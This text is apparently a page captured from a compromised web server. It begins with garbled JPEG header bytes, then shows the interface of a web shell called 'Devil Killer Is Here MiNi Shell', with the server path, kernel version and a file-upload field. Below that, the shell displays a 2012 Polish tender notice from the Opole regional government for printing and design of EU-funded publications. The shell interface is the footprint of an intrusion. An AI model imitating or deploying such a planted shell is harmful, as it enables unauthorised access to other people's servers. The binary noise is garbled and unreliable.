JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120323/92180-N-2012.html

<p class="kh_header"><b>Opole: Wydanie i druk publikacji, ulotek, plakatów i folderów w ramach: Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013, Programu Operacyjnego Kapitał Ludzki, Programu Operacyjnego Pomoc Techniczna oraz Programu Operacyjnego Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007-2013</b><br>
<b>Numer ogłoszenia: 92180 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Marszałkowski Województwa Opolskiego , ul. Piastowska 14, 45-082 Opole, woj. opolskie, tel. 077 5416409, faks 077 5416411.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwo.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wydanie i druk publikacji, ulotek, plakatów i folderów w ramach: Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013, Programu Operacyjnego Kapitał Ludzki, Programu Operacyjnego Pomoc Techniczna oraz Programu Operacyjnego Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wydanie i druk publikacji, ulotek, plakatów i folderów w ramach: Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013, Programu Operacyjnego Kapitał Ludzki, Programu Operacyjnego Pomoc Techniczna oraz Programu Operacyjnego Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007-2013.
Część I: Opracowanie graficzne, korekta językowa, skład komputerowy, przygotowanie do druku, druk i dystrybucja wydawnictw albumowych: promującego RPO WO 2007-2013 pod roboczym tytułem Fundusze w czterech porach roku oraz podsumowującego konkurs PO KL Kapitalni w Opolskiem - II edycja 

Opracowanie graficzne, korekta językowa, skład komputerowy, przygotowanie do druku, druk i dystrybucja wydawnictwa albumowego promującego RPO WO 2007-2013 pod roboczym tytułem Fundusze w czterech porach roku,
Opracowanie graficzne, korekta językowa, skład komputerowy, przygotowanie do druku, druk i dystrybucja wydawnictwa albumowego podsumowującego konkurs PO KL Kapitalni w Opolskiem - II edycja.

Nr CPV:  22100000-1 Drukowanie książek, broszur i ulotek, 79800000-2 Usługi drukowania i powiązane, 79970000-4 Usługi publikacji, 79822000-2 Usługi składu, 79822500-7 Usługi projektów graficznych, 79823000-9 Usługi drukowania i dostawy ) sporządzony zgodnie z art. 29 - 30 ustawy Pzp.

Do oferty Wykonawca dołączy próbki w postaci co najmniej dwóch formatu A4,wydanych przez siebie wydawnictw szytych o charakterze albumowych o objętości co najmniej 60 stron formatu A4 każde, które posłużą Zamawiającemu do porównania i oceny ofert.

Część II:Opracowanie graficzne, redakcja, korekta językowa, skład komputerowy, przygotowanie do druku i druk publikacji nt. komplementarności oraz publikacji nt. informacji i promocji, 

Opracowanie graficzne, redakcja, korekta językowa, skład komputerowy, przygotowanie do  druku i druk publikacji nt. komplementarności,
Opracowanie graficzne, redakcja, korekta językowa, skład komputerowy, przygotowanie do druku i druk publikacji nt. informacji i promocji, 

Nr CPV: 22100000-1 Drukowanie książek, broszur i ulotek, 79800000-2 Usługi drukowania i powiązane, 79970000-4 Usługi publikacji, 79822000-2 Usługi składu, 79822500-7 Usługi projektów graficznych, 79823000-9 Usługi drukowania i dostawy ) sporządzony zgodnie z art. 29 - 30 ustawy Pzp.
Do oferty Wykonawca dołączy próbki w postaci dwóch wydanych prz
ez siebie wydawnictw książkowych o charakterze naukowym o objętości co najmniej 100 stron formatu B5 każde, które posłużą Zamawiającemu do porównania i oceny ofert.

Część III: Druk ulotek, publikacji, plakatów, folderów w ramach: Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013, Programu Operacyjnego Kapitał Ludzki oraz Programu Operacyjnego Współpracy Transgranicznej Republika Czeska- Rzeczpospolita Polska 2007-2013.

Nr CPV: 22100000-1 Drukowanie książek, broszur i ulotek, 79800000-2 Usługi drukowania i powiązane, 79970000-4 Usługi publikacji, 79822000-2 Usługi składu, 79822500-7 Usługi projektów graficznych, 79823000-9  Usługi drukowania i dostawy ) sporządzony zgodnie z art. 29 - 30 ustawy Pzp.

Przedmiot zamówienia opisany jest w załącznikach do  Specyfikacji Istotnych Warunków Zamówienia (SIWZ) tj. Opisach przedmiotu zamówienia oraz Istotnych postanowieniach umowy  - odpowiednio dla: części I i części II, części III.

Ww. załączniki stanowią integralną część SIWZ oraz przyszłej umowy.
Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1, 79.80.00.00-2, 79.97.00.00-4, 79.82.20.00-2, 79.82.25.00-7, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie oprócz Oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, na podstawie, którego przeprowadzi ocenę spełnienia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie ww. warunku wykonawca zobowiązany jest do złożenia Oświadczenia o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy oraz;

Część I 
W ciągu ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawcy powinni wykazać należyte (tzn. potwierdzone pozytywnym protokołem odbioru, referencjami itp.) wykonanie co najmniej trzech usług polegających na opracowaniu graficznym, składzie komputerowym, korekcie językowej, przygotowaniu do druku oraz druku publikacji o charakterze albumowym, szytych o objętości co najmniej równej publikacji będącej przedmiotem niniejszego zamówienia, czyli 60 stron formatu A4
Część II
W ciągu ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawcy powinni wykazać należyte (tzn. potwierdzone pozytywnym protokołem odbioru, referencjami itp.) wykonanie co najmniej trzech usług polegających na opracowaniu graficznym, redakcji merytorycznej i technicznej, korekcie, składzie komputerowym, przygotowaniu do druku oraz druku publikacji książkowej o charakterze naukowym o objętości co najmniej równej publikacji będącej przedmiotem niniejszego zamówienia, czyli 100 stron formatu B5,
Część III
W ciągu ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawcy powinni wykazać należyte (tzn. potwierdzone pozytywnym protokołem odbioru, referencjami itp.) wykonanie co najmniej dwóch usług polegających na opracowaniu graficznym, składzie komputerowym, przygotowaniu do druku oraz druku publikacji o objętości co najmniej równej największej publikacji będącej przedmiotem niniejszego zamówienia, czyli 56 stron formatu A4,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu spełnienia warunku w tym zakresie oprócz oświadczenia o spełnieniu warunku, o którym mowa w art. 22 ustawy Prawo zamówień publicznych na podstawie, którego przeprowadzi ocenę spełnienia warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu spełnienia warunku w tym zakresie oprócz oświadczenia o spełnieniu warunku, o którym mowa w art. 22 ustawy Prawo zamówień publicznych na podstawie, którego przeprowadzi ocenę spełnienia warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego opisu spełnienia warunku w tym zakresie oprócz oświadczenia o spełnieniu warunku, na podstawie, którego przeprowadzi ocenę spełnienia warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Część I 

1.Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.
2.Zamawiający dopuszcza następujące zmiany postanowień zawartej umowy: 

1)gdy wystąpią okoliczności, które nie mogły być przewidziane przed podpisaniem umowy, nie wynikające z zaniedbań którejś ze stron a czas wydłużenia jest niezbędny do realizacji przedmiotu umowy, możliwe jest wydłużenie czasu realizacji umowy, 
2)gdy nastąpi ustawowa zmiana stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa i odpowiednio podwyższą lub obniżą wynagrodzenie brutto, kwota netto pozostaje stała,
3)gdy konieczne będą oszczędności środków publicznych lub Zamawiający nie wykorzysta posiadanych materiałów, Zamawiający może zmniejszyć przedmiot umowy, o którym mowa w §1, max o 30 % jego wartości brutto,
4)gdy wystąpią inne, niż przewidziane powyżej, zmiany dotyczące zawartej umowy, które są korzystne dla Zamawiającego, i które nie naruszają art. 140 ust. 3 ustawy 
z dnia 29.01.2004r. Prawo zamówień publicznych (t.j.: Dz. U. z 2010r. Nr 113, poz. 759 ze zm.),
5)Zamawiający zastrzega sobie prawo do zmniejszenia lub rezygnacji z części przedmiotu zamówienia. W tym przypadku nastąpi zmniejszenie łącznej wartości zamówienia o wartość nie wykonanej pracy.
6)gdy nastąpi zmiana przedmiotu umowy polegająca na zmniejszeniu liczby stron albumów, nastąpi zmniejszenie łącznej wartości zamówienia o koszt niewykonanych stron,
7)w przypadku zmiany źródła finansowania umowy,
8)gdy wynikną rozbieżności lub niejasności w umowie, których nie można usunąć 
w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
9)Zamawiający może odstąpić od zawartej umowy w sytuacji określonej w art. 145 ustawy Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010r. Nr 113, poz. 759 z późn. zm.) w formie pisemnej, pod rygorem nieważności,
10)W przypadku, o którym mowa powyżej Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu faktycznego wykonania części Umowy,

Część II 

1.Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.
2.Zamawiający dopuszcza następujące zmiany postanowień zawartej umowy: 

1)gdy wystąpią okoliczności, które nie mogły być przewidziane przed podpisaniem umowy, nie wynikające z zaniedbań którejś ze stron a czas wydłużenia jest niezbędny do realizacji przedmiotu umowy, możliwe jest wydłużenie czasu realizacji umowy, 
2)gdy nastąpi ustawowa zmiana stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa i odpowiednio podwyższą lub obniżą wynagrodzenie brutto, kwota netto pozostaje stała,
3)gdy konieczne będą oszczędności środków publicznych lub Zamawiający nie wykorzysta posiadanych materiałów, Zamawiający może zmniejszyć przedmiot umowy, o którym mowa w §1, max o 30 % jego wartości brutto,
4)gdy wystąpią inne, niż przewidziane powyżej, zmiany dotyczące zawartej umowy, które są korzystne dla Zamawiającego, i które nie naruszają art. 140 ust. 3 ustawy 
z dnia 29.01.2004r. Prawo zamówień publicznych (t.j.: Dz. U. z 2010r. Nr 113, poz. 759 ze zm.),
5)Zamawiający zastrzega sobie prawo do zmniejszenia lub rezygnacji z części przedmiotu zamówienia. W tym przypadku nastąpi zmniejszenie łącznej wartości zamówienia o wartość nie wykonanej pracy.
6)gdy nastąpi zmiana przedmiotu umowy polegająca na zmniejszeniu liczby stron publikacji,  nastąpi zmniejszenie łącznej wartości zamówienia o koszt niewykonanych stron,
7)w przypadku zmiany źródła finansowania umowy,
8)   gdy wynikną rozbieżności lub niejasności w umowie, których nie można usunąć 
w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
9)    Zamawiający może odstąpić od zawartej umowy w sytuacji określonej w art. 145 ustawy Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010r. Nr 113, poz. 759 z późn. zm.) w formie pisemnej, pod rygorem nieważności,
10)   W przypadku, o którym mowa powyżej Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu faktycznego wykonania części Umowy,

Część III 

1. Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.
2.Zamawiający dopuszcza następujące zmiany postanowień zawartej umowy: 

1)gdy wystąpią okoliczności, które nie mogły być przewidziane przed podpisaniem umowy, nie wynikające z zaniedbań którejś ze stron a czas wydłużenia jest niezbędny do realizacji przedmiotu umowy, możliwe jest wydłużenie czasu realizacji umowy, 
2)gdy nastąpi ustawowa zmiana stawki podatku VAT, strony dostosują wskazaną w umowie stawkę do obowiązujących przepisów prawa i odpowiednio podwyższą lub obniżą wynagrodzenie brutto, kwota netto pozostaje stała,
3)gdy konieczne będą oszczędności środków publicznych lub Zamawiający nie wykorzysta posiadanych materiałów, Zamawiający może zmniejszyć przedmiot umowy, o którym mowa w §1, o max. 30 % jego wartości brutto,
4)gdy nastąpi zmiana przedmiotu umowy polegająca na zmniejszeniu liczby rodzajów, a także ilości ulotek do wykonania, nastąpi zmniejszenie łącznej wartości zamówienia o kwotę niewykonanych ulotek, zgodnie z cenami jednostkowymi podanymi przez Wykonawcę,
5)gdy nastąpi zmiana przedmiotu umowy polegająca na zmniejszeniu ilości folderów do wykonania, nastąpi zmniejszenie łącznej wartości zamówienia o kwotę niewykonanych folderów, zgodnie z cenami jednostkowymi podanymi przez Wykonawcę,
6)gdy nastąpi zmiana przedmiotu umowy polegająca na zmniejszeniu ilości stron publikacji do wykonania, nastąpi zmniejszenie łącznej wartości zamówienia o kwotę niewykonanych stron, zgodnie z cenami jednostkowymi podanymi przez Wykonawcę,
7)gdy nastąpi zmiana przedmiotu umowy polegająca na zmniejszeniu ilości plakatów do wykonania, nastąpi zmniejszenie łącznej wartości zamówienia o kwotę niewykonanych plakatów, zgodnie z cenami jednostkowymi podanymi przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://umwo.opole.pl/bip/index.php?id=1077<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Opolskiego, ul. Piastowska 14 45-082 Opole pok. 109..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Opolskiego, ul. Piastowska 14 45-082 Opole pok. 109..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> cz.I Zamówienie jest współfinansowane ze środków Unii Europejskiej, ze środków:
Europejskiego Funduszu Rozwoju Regionalnego w ramach pomocy technicznej Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013,
Europejskiego Funduszu Społecznego oraz środków budżetu województwa opolskiego w ramach pomocy technicznej Programu Operacyjnego Kapitał Ludzki.
cz.II 
Europejskiego Funduszu Rozwoju Regionalnego w ramach pomocy technicznej Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013,
Europejskiego Funduszu Społecznego oraz środków budżetu województwa opolskiego w ramach pomocy technicznej Programu Operacyjnego Kapitał Ludzki.
środków Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa (15%) w ramach Programu Operacyjnego Współpracy Transgranicznej Republika Czeska - Rzeczpospolita Polska 2007-2013.
cz.III
Europejskiego Funduszu Rozwoju Regionalnego w ramach pomocy technicznej Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013,
Europejskiego Funduszu Społecznego oraz środków budżetu województwa opolskiego w ramach pomocy technicznej Programu Operacyjnego Kapitał Ludzki.
środków Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa w ramach Programu Operacyjnego Pomoc Techniczna
środków Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa (15%) w ramach Programu Operacyjnego Współpracy Transgranicznej Republika Czeska - Rzeczpospolita Polska 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie graficzne, korekta językowa, skład komputerowy, przygotowanie do druku, druk i dystrybucja wydawnictw albumowych: promującego RPO WO 2007-2013 pod roboczym tytułem Fundusze w czterech porach roku oraz podsumowującego konkurs PO KL Kapitalni w Opolskiem - II edycja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie graficzne, korekta językowa, skład komputerowy, przygotowanie do druku, druk i dystrybucja wydawnictw albumowych: promującego RPO WO 2007-2013 pod roboczym tytułem Fundusze w czterech porach roku oraz podsumowującego konkurs PO KL Kapitalni w Opolskiem - II edycja
-Opracowanie graficzne, korekta językowa, skład komputerowy, przygotowanie do druku, druk i dystrybucja wydawnictwa albumowego promującego RPO WO 2007-2013 pod roboczym tytułem Fundusze w czterech porach roku,
-Opracowanie graficzne, korekta językowa, skład komputerowy, przygotowanie do druku, druk i dystrybucja wydawnictwa albumowego podsumowującego konkurs PO KL Kapitalni w Opolskiem - II edycja, 
Nr CPV:  22100000-1 Drukowanie książek, broszur i ulotek, 79800000-2 Usługi drukowania i powiązane, 79970000-4 Usługi publikacji, 79822000-2 Usługi składu, 79822500-7 Usługi projektów graficznych, 79823000-9 Usługi drukowania i dostawy ) sporządzony zgodnie z art. 29 - 30 ustawy Pzp.
Do oferty Wykonawca dołączy próbki w postaci co najmniej dwóch formatu A4,wydanych przez siebie wydawnictw szytych o charakterze albumowych o objętości co najmniej 60 stron formatu A4 każde, które posłużą Zamawiającemu do porównania i oceny ofert.
